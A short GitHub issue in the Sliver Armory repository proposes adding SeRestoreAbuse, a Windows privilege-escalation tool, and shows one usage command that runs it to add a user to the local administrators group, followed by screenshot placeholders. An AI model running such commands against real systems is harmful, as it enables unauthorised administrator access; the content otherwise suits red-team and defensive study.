sliverarmory / armory

The Official Sliver Armory
https://sliver.sh/
78 stars 11 forks source link

Adding SeRestoreAbuse to armory list #55

Open Rajchowdhury420 opened 1 month ago

Rajchowdhury420 commented 1 month ago

the main repo : https://github.com/xct/SeRestoreAbuse

Abuse the SeRestorePrivilege

.\SeRestoreAbuse.exe "cmd /c net localgroup administrators <usernametobeaddedtoadministratorgrouphere> /add"

Validate

whoami /priv
Rajchowdhury420 commented 1 month ago

Demo

image

Exploit time

image

Validate the permission got modified or not

image